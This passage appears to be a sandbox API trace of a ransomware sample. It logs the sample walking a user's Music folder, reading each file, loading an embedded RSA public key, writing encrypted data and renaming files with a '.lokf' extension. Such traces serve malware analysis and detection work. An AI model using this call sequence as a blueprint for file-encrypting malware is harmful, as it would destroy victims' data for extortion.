(HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a28 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a10 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.962] GetCurrentThreadId () returned 0x9e0 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84ec8 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.963] GetCurrentThreadId () returned 0x9e0 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a10 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a28 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859f8 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a40 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a10 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a10 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a10 | out: hHeap=0x660000) returned 1 [0059.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a40 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a28 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859f8 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859e0 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88760 | out: hHeap=0x660000) returned 1 [0059.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.966] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x4f04, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x4f04, lpOverlapped=0x0) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.966] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4f09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.966] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.967] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.967] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.967] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.967] CloseHandle (hObject=0x5cc) returned 1 [0059.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a90 [0059.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269a90 | out: hHeap=0x660000) returned 1 [0059.968] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2u2pj-4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\2u2pj-4.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2u2pj-4.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\2u2pj-4.mp3.lokf")) returned 1 [0059.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.968] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0059.969] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf8ec10, ftCreationTime.dwHighDateTime=0x1d4c818, ftLastAccessTime.dwLowDateTime=0xe97a1e80, ftLastAccessTime.dwHighDateTime=0x1d4cf43, ftLastWriteTime.dwLowDateTime=0xe97a1e80, ftLastWriteTime.dwHighDateTime=0x1d4cf43, nFileSizeHigh=0x0, nFileSizeLow=0x8183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DgdvfX7vLuA3.m4a", cAlternateFileName="DGDVFX~1.M4A")) returned 1 [0059.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0059.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.969] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\DgdvfX7vLuA3.m4a") returned=".m4a" [0059.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\DgdvfX7vLuA3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\dgdvfx7vlua3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.970] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=33155) returned 1 [0059.970] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.972] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x815d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.972] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.973] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.973] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x8183, lpOverlapped=0x0) returned 1 [0059.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.973] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.973] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.974] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.974] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.974] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.974] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.974] GetLastError () returned 0x0 [0059.974] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.974] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.974] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.974] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.974] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8180) returned 0x9c88ae8 [0059.975] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88760 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859e0 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c887a8 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859f8 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a28 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a40 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.975] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.975] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a28 | out: hHeap=0x660000) returned 1 [0059.975] 